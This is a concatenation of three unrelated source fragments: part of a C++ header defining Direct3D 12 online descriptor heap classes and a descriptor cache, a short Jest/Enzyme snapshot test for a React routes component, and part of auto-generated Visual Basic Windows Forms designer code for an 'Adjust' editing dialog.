uint32 DescriptorSize;
D3D12_CPU_DESCRIPTOR_HANDLE CPUBase;
D3D12_GPU_DESCRIPTOR_HANDLE GPUBase;
	// This index indicates where the next set of descriptors should be placed *if* there's room
uint32 NextSlotIndex;
	// Indicates the last slot freed when a command list finished executing
uint32 FirstUsedSlot;
// Keeping this ptr around is basically just for lifetime management
TRefCountPtr<ID3D12DescriptorHeap> Heap;
// Desc contains the number of slots and allows for easy recreation
D3D12_DESCRIPTOR_HEAP_DESC Desc;
const bool bCanLoopAround;
};
class FD3D12GlobalOnlineHeap : public FD3D12OnlineHeap
{
public:
FD3D12GlobalOnlineHeap(FD3D12Device* Device, GPUNodeMask Node)
: bUniqueDescriptorTablesAreDirty(false)
, FD3D12OnlineHeap(Device, Node, false)
{ }
void Init(uint32 TotalSize, D3D12_DESCRIPTOR_HEAP_TYPE Type);
void ToggleDescriptorTablesDirtyFlag(bool Value) { bUniqueDescriptorTablesAreDirty = Value; }
bool DescriptorTablesDirty() { return bUniqueDescriptorTablesAreDirty; }
FD3D12SamplerSet& GetUniqueDescriptorTables() { return UniqueDescriptorTables; }
FCriticalSection& GetCriticalSection() { return CriticalSection; }
bool RollOver();
private:
FD3D12SamplerSet UniqueDescriptorTables;
bool bUniqueDescriptorTablesAreDirty;
FCriticalSection CriticalSection;
};
struct FD3D12OnlineHeapBlock
{
public:
FD3D12OnlineHeapBlock(uint32 _BaseSlot, uint32 _Size) :
BaseSlot(_BaseSlot), Size(_Size), SizeUsed(0), bFresh(true) {};
FD3D12OnlineHeapBlock() : BaseSlot(0), Size(0), SizeUsed(0), bFresh(true) {}
FD3D12CLSyncPoint SyncPoint;
uint32 BaseSlot;
uint32 Size;
uint32 SizeUsed;
// Indicates that this has never been used in a Command List before
bool bFresh;
};
class FD3D12SubAllocatedOnlineHeap : public FD3D12OnlineHeap
{
public:
struct SubAllocationDesc
{
SubAllocationDesc() :ParentHeap(nullptr), BaseSlot(0), Size(0) {};
SubAllocationDesc(FD3D12GlobalOnlineHeap* _ParentHeap, uint32 _BaseSlot, uint32 _Size) :
ParentHeap(_ParentHeap), BaseSlot(_BaseSlot), Size(_Size) {};
FD3D12GlobalOnlineHeap* ParentHeap;
uint32 BaseSlot;
uint32 Size;
};
FD3D12SubAllocatedOnlineHeap(FD3D12Device* Device, GPUNodeMask Node, FD3D12DescriptorCache* Parent) :
FD3D12OnlineHeap(Device, Node, false, Parent) {};
void Init(SubAllocationDesc _Desc);
// Specializations
bool RollOver();
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
virtual uint32 GetTotalSize() final override
{
return CurrentSubAllocation.Size;
}
private:
TQueue<FD3D12OnlineHeapBlock> DescriptorBlockPool;
SubAllocationDesc SubDesc;
FD3D12OnlineHeapBlock CurrentSubAllocation;
};
class FD3D12ThreadLocalOnlineHeap : public FD3D12OnlineHeap
{
public:
FD3D12ThreadLocalOnlineHeap(FD3D12Device* Device, GPUNodeMask Node, FD3D12DescriptorCache* _Parent)
: FD3D12OnlineHeap(Device, Node, true, _Parent)
{ }
bool RollOver();
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
void Init(uint32 NumDescriptors, D3D12_DESCRIPTOR_HEAP_TYPE Type);
private:
struct SyncPointEntry
{
FD3D12CLSyncPoint SyncPoint;
uint32 LastSlotInUse;
SyncPointEntry() : LastSlotInUse(0)
{}
SyncPointEntry(const SyncPointEntry& InSyncPoint) : SyncPoint(InSyncPoint.SyncPoint), LastSlotInUse(InSyncPoint.LastSlotInUse)
{}
SyncPointEntry& operator = (const SyncPointEntry& InSyncPoint)
{
SyncPoint = InSyncPoint.SyncPoint;
LastSlotInUse = InSyncPoint.LastSlotInUse;
return *this;
}
};
TQueue<SyncPointEntry> SyncPoints;
struct PoolEntry
{
TRefCountPtr<ID3D12DescriptorHeap> Heap;
FD3D12CLSyncPoint SyncPoint;
PoolEntry()
{}
PoolEntry(const PoolEntry& InPoolEntry) : Heap(InPoolEntry.Heap), SyncPoint(InPoolEntry.SyncPoint)
{}
PoolEntry& operator = (const PoolEntry& InPoolEntry)
{
Heap = InPoolEntry.Heap;
SyncPoint = InPoolEntry.SyncPoint;
return *this;
}
};
PoolEntry Entry;
TQueue<PoolEntry> ReclaimPool;
};
//-----------------------------------------------------------------------------
// FD3D12DescriptorCache Class Definition
//-----------------------------------------------------------------------------
class FD3D12DescriptorCache : public FD3D12DeviceChild, public FD3D12SingleNodeGPUObject
{
protected:
FD3D12CommandContext* CmdContext;
public:
FD3D12OnlineHeap* GetCurrentViewHeap() { return CurrentViewHeap; }
FD3D12OnlineHeap* GetCurrentSamplerHeap() { return CurrentSamplerHeap; }
FD3D12DescriptorCache(GPUNodeMask Node);
~FD3D12DescriptorCache()
{
if (LocalViewHeap) { delete(LocalViewHeap); }
}
inline ID3D12DescriptorHeap* GetViewDescriptorHeap()
{
return CurrentViewHeap->GetHeap();
}
inline ID3D12DescriptorHeap* GetSamplerDescriptorHeap()
{
return CurrentSamplerHeap->GetHeap();
}
// Checks if the specified descriptor heap has been set on the current command list.
bool IsHeapSet(ID3D12DescriptorHeap* const pHeap) const
{
return (pHeap == pPreviousViewHeap) || (pHeap == pPreviousSamplerHeap);
}
// Notify the descriptor cache every time you start recording a command list.
// This sets descriptor heaps on the command list and indicates the current fence value which allows
// us to avoid querying DX12 for that value thousands of times per frame, which can be costly.
void NotifyCurrentCommandList(const FD3D12CommandListHandle& CommandListHandle);
// ------------------------------------------------------
// end Descriptor Slot Reservation stuff
// null views
TRefCountPtr<FD3D12ShaderResourceView> pNullSRV;
TRefCountPtr<FD3D12UnorderedAccessView> pNullUAV;
TRefCountPtr<FD3D12RenderTargetView> pNullRTV;
#if USE_STATIC_ROOT_SIGNATURE
FD3D12ConstantBufferView* pNullCBV;
#endif
TRefCountPtr<FD3D12SamplerState> pDefaultSampler;
void SetIndexBuffer(FD3D12IndexBufferCache& Cache);
void SetVertexBuffers(FD3D12VertexBufferCache& Cache);
void SetRenderTargets(FD3D12RenderTargetView** RenderTargetViewArray, uint32 Count, FD3D12DepthStencilView* DepthStencilTarget);
template <EShaderFrequency ShaderStage>
void SetUAVs(FD3D12UnorderedAccessViewCache& Cache, const UAVSlotMask& SlotsNeededMask, uint32 Count, uint32 &HeapSlot);
template <EShaderFrequency ShaderStage>
void SetSamplers(FD3D12SamplerStateCache& Cache, const SamplerSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
template <EShaderFrequency ShaderStage>
void SetSRVs(FD3D12ShaderResourceViewCache& Cache, const SRVSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
template <EShaderFrequency ShaderStage>
#if USE_STATIC_ROOT_SIGNATURE
void SetConstantBuffers(FD3D12ConstantBufferCache& Cache, const CBVSlotMask& SlotsNeededMask, uint32 Count, uint32& HeapSlot);
#else
void SetConstantBuffers(FD3D12ConstantBufferCache& Cache, const CBVSlotMask& SlotsNeededMask);
#endif
void SetStreamOutTargets(FD3D12Resource **Buffers, uint32 Count, const uint32* Offsets);
bool HeapRolledOver(D3D12_DESCRIPTOR_HEAP_TYPE Type);
void HeapLoopedAround(D3D12_DESCRIPTOR_HEAP_TYPE Type);
void Init(FD3D12Device* InParent, FD3D12CommandContext* InCmdContext, uint32 InNumLocalViewDescriptors, uint32 InNumSamplerDescriptors, FD3D12SubAllocatedOnlineHeap::SubAllocationDesc& SubHeapDesc);
void Clear();
void BeginFrame();
void EndFrame();
void GatherUniqueSamplerTables();
bool SwitchToContextLocalViewHeap(const FD3D12CommandListHandle& CommandListHandle);
bool SwitchToContextLocalSamplerHeap();
bool SwitchToGlobalSamplerHeap();
TArray<FD3D12UniqueSamplerTable>& GetUniqueTables() { return UniqueTables; }
inline bool UsingGlobalSamplerHeap() const { return bUsingGlobalSamplerHeap; }
FD3D12SamplerSet& GetLocalSamplerSet() { return LocalSamplerSet; }
private:
// Sets the current descriptor tables on the command list and marks any descriptor tables as dirty if necessary.
// Returns true if one of the heaps actually changed, false otherwise.
bool SetDescriptorHeaps();
// The previous view and sampler heaps set on the current command list.
ID3D12DescriptorHeap* pPreviousViewHeap;
ID3D12DescriptorHeap* pPreviousSamplerHeap;
FD3D12OnlineHeap* CurrentViewHeap;
FD3D12OnlineHeap* CurrentSamplerHeap;
FD3D12ThreadLocalOnlineHeap* LocalViewHeap;
FD3D12ThreadLocalOnlineHeap LocalSamplerHeap;
FD3D12SubAllocatedOnlineHeap SubAllocatedViewHeap;
FD3D12SamplerMap SamplerMap;
TArray<FD3D12UniqueSamplerTable> UniqueTables;
FD3D12SamplerSet LocalSamplerSet;
bool bUsingGlobalSamplerHeap;
uint32 NumLocalViewDescriptors;
};
| {
"pile_set_name": "Github"
} |
import React from 'react';
import {shallow} from 'enzyme/build';
import Routes from '../routes';
describe('Routes component test suite', () => {
test('Snapshot render', () => {
// Given
const routes = shallow(<Routes />);
// When
const wrappedSwitch = routes.find('SwitchWrapper').dive();
// Then
expect(wrappedSwitch).toMatchSnapshot();
});
});
| {
"pile_set_name": "Github"
} |
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
Partial Class EditingForm_Adjust
Inherits SharedClasses.ObjectEditorForm
'Form overrides dispose to clean up the component list.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Required by the Windows Form Designer
Private components As System.ComponentModel.IContainer
'NOTE: The following procedure is required by the Windows Form Designer
'It can be modified using the Windows Form Designer.
'Do not modify it using the code editor.
<System.Diagnostics.DebuggerStepThrough()> _
Private Sub InitializeComponent()
Me.components = New System.ComponentModel.Container()
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(EditingForm_Adjust))
Me.GroupBox5 = New System.Windows.Forms.GroupBox()
Me.lblTag = New System.Windows.Forms.TextBox()
Me.chkActive = New System.Windows.Forms.CheckBox()
Me.Label11 = New System.Windows.Forms.Label()
Me.GroupBox4 = New System.Windows.Forms.GroupBox()
Me.rtbAnnotations = New Extended.Windows.Forms.RichTextBoxExtended()
Me.GroupBox2 = New System.Windows.Forms.GroupBox()
Me.tbTolerance = New System.Windows.Forms.TextBox()
Me.Label1 = New System.Windows.Forms.Label()
Me.lblSPUnits = New System.Windows.Forms.Label()
Me.btnOpenControlPanel = New System.Windows.Forms.Button()
Me.tbSetPoint = New System.Windows.Forms.TextBox()
Me.Label3 = New System.Windows.Forms.Label()
Me.chkSolveGlobal = New System.Windows.Forms.CheckBox()
Me.GroupBox1 = New System.Windows.Forms.GroupBox()
Me.chkUseReferenced = New System.Windows.Forms.CheckBox()
Me.lblRefVal = New System.Windows.Forms.Label()
Me.Label9 = New System.Windows.Forms.Label()
Me.Label10 = New System.Windows.Forms.Label()
Me.cbRefProp = New System.Windows.Forms.ComboBox()
Me.cbRefObj = New System.Windows.Forms.ComboBox()
Me.lblTargetVal = New System.Windows.Forms.Label()
Me.lblSourceVal = New System.Windows.Forms.Label()
Me.Label6 = New System.Windows.Forms.Label()
Me.Label5 = New System.Windows.Forms.Label()
Me.Label2 = New System.Windows.Forms.Label()
Me.cbTargetProp = New System.Windows.Forms.ComboBox()
Me.cbTargetObj = New System.Windows.Forms.ComboBox()
Me.Label4 = New System.Windows.Forms.Label()
Me.Label7 = New System.Windows.Forms.Label()
Me.cbSourceProp = New System.Windows.Forms.ComboBox()
Me.cbSourceObj = New System.Windows.Forms.ComboBox()
Me.Label19 = New System.Windows.Forms.Label()
Me.ToolTip1 = New System.Windows.Forms.ToolTip(Me.components)
Me.ToolTipChangeTag = New System.Windows.Forms.ToolTip(Me.components)
Me.GroupBox5.SuspendLayout()
Me.GroupBox4.SuspendLayout()
Me.GroupBox2.SuspendLayout()
Me.GroupBox1.SuspendLayout()
Me.SuspendLayout()
'
'GroupBox5
'
resources.ApplyResources(Me.GroupBox5, "GroupBox5")
Me.GroupBox5.Controls.Add(Me.lblTag)
Me.GroupBox5.Controls.Add(Me.chkActive)
Me.GroupBox5.Controls.Add(Me.Label11)
Me.GroupBox5.Name = "GroupBox5"
Me.GroupBox5.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox5, resources.GetString("GroupBox5.ToolTip2"))
'
'lblTag
'
resources.ApplyResources(Me.lblTag, "lblTag")
Me.lblTag.Name = "lblTag"
Me.ToolTipValues.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip"))
Me.ToolTip1.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.lblTag, resources.GetString("lblTag.ToolTip2"))
'
'chkActive
'
resources.ApplyResources(Me.chkActive, "chkActive")
Me.chkActive.Image = Global.DWSIM.UnitOperations.My.Resources.Resources.bullet_tick
Me.chkActive.Name = "chkActive"
Me.ToolTip1.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkActive, resources.GetString("chkActive.ToolTip2"))
Me.chkActive.UseVisualStyleBackColor = True
'
'Label11
'
resources.ApplyResources(Me.Label11, "Label11")
Me.Label11.Name = "Label11"
Me.ToolTip1.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label11, resources.GetString("Label11.ToolTip2"))
'
'GroupBox4
'
resources.ApplyResources(Me.GroupBox4, "GroupBox4")
Me.GroupBox4.Controls.Add(Me.rtbAnnotations)
Me.GroupBox4.Name = "GroupBox4"
Me.GroupBox4.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox4, resources.GetString("GroupBox4.ToolTip2"))
'
'rtbAnnotations
'
resources.ApplyResources(Me.rtbAnnotations, "rtbAnnotations")
Me.rtbAnnotations.Name = "rtbAnnotations"
Me.rtbAnnotations.Rtf = "{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1046{\fonttbl{\f0\fnil Microsoft " &
"Sans Serif;}}" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "{\*\generator Riched20 10.0.17763}\viewkind4\uc1 " & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "\pard\f0\fs17\" &
"par" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "}" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)
Me.rtbAnnotations.ShowRedo = False
Me.rtbAnnotations.ShowUndo = False
Me.ToolTipValues.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip"))
Me.ToolTip1.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.rtbAnnotations, resources.GetString("rtbAnnotations.ToolTip2"))
'
'GroupBox2
'
resources.ApplyResources(Me.GroupBox2, "GroupBox2")
Me.GroupBox2.Controls.Add(Me.tbTolerance)
Me.GroupBox2.Controls.Add(Me.Label1)
Me.GroupBox2.Controls.Add(Me.lblSPUnits)
Me.GroupBox2.Controls.Add(Me.btnOpenControlPanel)
Me.GroupBox2.Controls.Add(Me.tbSetPoint)
Me.GroupBox2.Controls.Add(Me.Label3)
Me.GroupBox2.Controls.Add(Me.chkSolveGlobal)
Me.GroupBox2.Name = "GroupBox2"
Me.GroupBox2.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox2, resources.GetString("GroupBox2.ToolTip2"))
'
'tbTolerance
'
resources.ApplyResources(Me.tbTolerance, "tbTolerance")
Me.tbTolerance.Name = "tbTolerance"
Me.ToolTipValues.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip"))
Me.ToolTip1.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.tbTolerance, resources.GetString("tbTolerance.ToolTip2"))
'
'Label1
'
resources.ApplyResources(Me.Label1, "Label1")
Me.Label1.Name = "Label1"
Me.ToolTip1.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip2"))
'
'lblSPUnits
'
resources.ApplyResources(Me.lblSPUnits, "lblSPUnits")
Me.lblSPUnits.Name = "lblSPUnits"
Me.ToolTip1.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblSPUnits, resources.GetString("lblSPUnits.ToolTip2"))
'
'btnOpenControlPanel
'
resources.ApplyResources(Me.btnOpenControlPanel, "btnOpenControlPanel")
Me.btnOpenControlPanel.Name = "btnOpenControlPanel"
Me.ToolTip1.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.btnOpenControlPanel, resources.GetString("btnOpenControlPanel.ToolTip2"))
Me.btnOpenControlPanel.UseVisualStyleBackColor = True
'
'tbSetPoint
'
resources.ApplyResources(Me.tbSetPoint, "tbSetPoint")
Me.tbSetPoint.Name = "tbSetPoint"
Me.ToolTipValues.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip"))
Me.ToolTip1.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.tbSetPoint, resources.GetString("tbSetPoint.ToolTip2"))
'
'Label3
'
resources.ApplyResources(Me.Label3, "Label3")
Me.Label3.Name = "Label3"
Me.ToolTip1.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label3, resources.GetString("Label3.ToolTip2"))
'
'chkSolveGlobal
'
resources.ApplyResources(Me.chkSolveGlobal, "chkSolveGlobal")
Me.chkSolveGlobal.Name = "chkSolveGlobal"
Me.ToolTip1.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkSolveGlobal, resources.GetString("chkSolveGlobal.ToolTip2"))
Me.chkSolveGlobal.UseVisualStyleBackColor = True
'
'GroupBox1
'
resources.ApplyResources(Me.GroupBox1, "GroupBox1")
Me.GroupBox1.Controls.Add(Me.chkUseReferenced)
Me.GroupBox1.Controls.Add(Me.lblRefVal)
Me.GroupBox1.Controls.Add(Me.Label9)
Me.GroupBox1.Controls.Add(Me.Label10)
Me.GroupBox1.Controls.Add(Me.cbRefProp)
Me.GroupBox1.Controls.Add(Me.cbRefObj)
Me.GroupBox1.Controls.Add(Me.lblTargetVal)
Me.GroupBox1.Controls.Add(Me.lblSourceVal)
Me.GroupBox1.Controls.Add(Me.Label6)
Me.GroupBox1.Controls.Add(Me.Label5)
Me.GroupBox1.Controls.Add(Me.Label2)
Me.GroupBox1.Controls.Add(Me.cbTargetProp)
Me.GroupBox1.Controls.Add(Me.cbTargetObj)
Me.GroupBox1.Controls.Add(Me.Label4)
Me.GroupBox1.Controls.Add(Me.Label7)
Me.GroupBox1.Controls.Add(Me.cbSourceProp)
Me.GroupBox1.Controls.Add(Me.cbSourceObj)
Me.GroupBox1.Controls.Add(Me.Label19)
Me.GroupBox1.Name = "GroupBox1"
Me.GroupBox1.TabStop = False
Me.ToolTipChangeTag.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip1"))
Me.ToolTip1.SetToolTip(Me.GroupBox1, resources.GetString("GroupBox1.ToolTip2"))
'
'chkUseReferenced
'
resources.ApplyResources(Me.chkUseReferenced, "chkUseReferenced")
Me.chkUseReferenced.Name = "chkUseReferenced"
Me.ToolTip1.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.chkUseReferenced, resources.GetString("chkUseReferenced.ToolTip2"))
Me.chkUseReferenced.UseVisualStyleBackColor = True
'
'lblRefVal
'
resources.ApplyResources(Me.lblRefVal, "lblRefVal")
Me.lblRefVal.Name = "lblRefVal"
Me.ToolTip1.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblRefVal, resources.GetString("lblRefVal.ToolTip2"))
'
'Label9
'
resources.ApplyResources(Me.Label9, "Label9")
Me.Label9.Name = "Label9"
Me.ToolTip1.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label9, resources.GetString("Label9.ToolTip2"))
'
'Label10
'
resources.ApplyResources(Me.Label10, "Label10")
Me.Label10.Name = "Label10"
Me.ToolTip1.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label10, resources.GetString("Label10.ToolTip2"))
'
'cbRefProp
'
resources.ApplyResources(Me.cbRefProp, "cbRefProp")
Me.cbRefProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbRefProp.FormattingEnabled = True
Me.cbRefProp.Name = "cbRefProp"
Me.ToolTip1.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbRefProp, resources.GetString("cbRefProp.ToolTip2"))
'
'cbRefObj
'
resources.ApplyResources(Me.cbRefObj, "cbRefObj")
Me.cbRefObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbRefObj.FormattingEnabled = True
Me.cbRefObj.Name = "cbRefObj"
Me.ToolTip1.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbRefObj, resources.GetString("cbRefObj.ToolTip2"))
'
'lblTargetVal
'
resources.ApplyResources(Me.lblTargetVal, "lblTargetVal")
Me.lblTargetVal.Name = "lblTargetVal"
Me.ToolTip1.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblTargetVal, resources.GetString("lblTargetVal.ToolTip2"))
'
'lblSourceVal
'
resources.ApplyResources(Me.lblSourceVal, "lblSourceVal")
Me.lblSourceVal.Name = "lblSourceVal"
Me.ToolTip1.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.lblSourceVal, resources.GetString("lblSourceVal.ToolTip2"))
'
'Label6
'
resources.ApplyResources(Me.Label6, "Label6")
Me.Label6.Name = "Label6"
Me.ToolTip1.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip2"))
'
'Label5
'
resources.ApplyResources(Me.Label5, "Label5")
Me.Label5.Name = "Label5"
Me.ToolTip1.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label5, resources.GetString("Label5.ToolTip2"))
'
'Label2
'
resources.ApplyResources(Me.Label2, "Label2")
Me.Label2.Name = "Label2"
Me.ToolTip1.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label2, resources.GetString("Label2.ToolTip2"))
'
'cbTargetProp
'
resources.ApplyResources(Me.cbTargetProp, "cbTargetProp")
Me.cbTargetProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbTargetProp.FormattingEnabled = True
Me.cbTargetProp.Name = "cbTargetProp"
Me.ToolTip1.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbTargetProp, resources.GetString("cbTargetProp.ToolTip2"))
'
'cbTargetObj
'
resources.ApplyResources(Me.cbTargetObj, "cbTargetObj")
Me.cbTargetObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbTargetObj.FormattingEnabled = True
Me.cbTargetObj.Name = "cbTargetObj"
Me.ToolTip1.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbTargetObj, resources.GetString("cbTargetObj.ToolTip2"))
'
'Label4
'
resources.ApplyResources(Me.Label4, "Label4")
Me.Label4.Name = "Label4"
Me.ToolTip1.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label4, resources.GetString("Label4.ToolTip2"))
'
'Label7
'
resources.ApplyResources(Me.Label7, "Label7")
Me.Label7.Name = "Label7"
Me.ToolTip1.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip2"))
'
'cbSourceProp
'
resources.ApplyResources(Me.cbSourceProp, "cbSourceProp")
Me.cbSourceProp.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbSourceProp.FormattingEnabled = True
Me.cbSourceProp.Name = "cbSourceProp"
Me.ToolTip1.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbSourceProp, resources.GetString("cbSourceProp.ToolTip2"))
'
'cbSourceObj
'
resources.ApplyResources(Me.cbSourceObj, "cbSourceObj")
Me.cbSourceObj.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList
Me.cbSourceObj.FormattingEnabled = True
Me.cbSourceObj.Name = "cbSourceObj"
Me.ToolTip1.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip"))
Me.ToolTipValues.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip1"))
Me.ToolTipChangeTag.SetToolTip(Me.cbSourceObj, resources.GetString("cbSourceObj.ToolTip2"))
'
'Label19
'
resources.ApplyResources(Me.Label19, "Label19")
Me.Label19.Name = "Label19"
Me.ToolTip1.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip"))
Me.ToolTipChangeTag.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip1"))
Me.ToolTipValues.SetToolTip(Me.Label19, resources.GetString("Label19.ToolTip2"))
'
'ToolTipChangeTag
'
Me.ToolTipChangeTag.ToolTipIcon = System.Windows.Forms.ToolTipIcon.Info
Me.ToolTipChangeTag.ToolTipTitle = "Info"
'
'EditingForm_Adjust
'
resources.ApplyResources(Me, "$this")
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
Me.Controls.Add(Me.GroupBox1)
Me.Controls.Add(Me.GroupBox5)
Me.Controls.Add(Me.GroupBox4)
